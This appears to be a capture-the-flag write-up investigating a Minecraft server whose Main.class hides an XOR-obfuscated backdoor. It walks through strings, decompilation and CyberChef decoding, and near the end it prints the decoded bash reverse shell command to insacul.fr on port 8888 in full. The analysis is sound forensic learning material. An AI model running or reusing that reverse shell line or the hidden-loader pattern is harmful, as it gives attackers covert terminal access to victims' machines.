PHASE 03: MISC

Minecraft Server C2 Investigation

Goal: Identify the domain name and port of the Command and Control (C2) server hidden within a Minecraft server infrastructure.

Step 1: Mapping the Terrain

The investigation began by executing the tree command to map the server structure. We needed to know exactly what we were looking at before diving into the files.

Directory Tree Structure
Sweating Jordan Peele Meme

We identified a specific file, net/minecraft/bundler/Main.class, sitting loose in the folder. This caught our attention immediately—it's the entry point, the first code that executes when the server starts.

Highlighted Main.class File Structure

Step 2: String Extraction

Searching for human-readable clues, I ran strings on the Main.class file. The output revealed highly suspicious lines that didn't look like standard Minecraft code:

  • • References to startLinuxMinecraftUpdateDaemon and startWindowsUpdateDaemon.
  • • A cryptic, obfuscated string: a89fc9d6ead3d39ef4d89a91ae9hcc91be9dca91ef8d959bb9de8a8@eccf.
  • • Use of hexStringToByteArray and decodeString functions.
  • • A reference to a port with the hex value f2c68286.

Step 3: Decompilation and Logic Analysis

To understand the obfuscation, I decompiled the class file using Procyon. It was time to see the actual logic behind these updates.

Anthony Adams Rubbing Hands Meme

The source code confirmed an XOR cipher was being used for the network activity. Crucially, I found a static key hidden in a static {} block:

char[] KEY = { '\u00ca', '\u00fe' };

Decompiled Java code showing KEY

Step 4: Decoding the "Java Magic"

The key 0xCAFEBABE is a standard Java magic number, but finding it manually defined as a variable is like finding a safe with the combination on a sticky note. I used CyberChef to unescape the Unicode and confirm the key.

CyberChef Unicode Unescape
Wait what are you doing here meme

Step 5: Extracting the Payload

Using cafebabe as the XOR key in CyberChef, I decoded the suspicious strings found earlier. One by one, the attacker's infrastructure was revealed:

CMD The Command: Decoded to bash -i >& /dev/tcp/%s/%s 0>&1
PORT The Port: Decoded to 8888
URL The Domain: Decoded to insacul.fr
CyberChef XOR Decoding Command
Unexpected visitor in back door meme
CyberChef XOR Decoding Domain

Final Conclusion: The Payload

The malware combines these pieces to execute a reverse shell on the victim's Linux machine:

bash -i >& /dev/tcp/insacul.fr/8888 0>&1

This establishes a secret tunnel to insacul.fr, giving the attacker full terminal access. Investigation closed.

Cristiano Ronaldo SIUUU Meme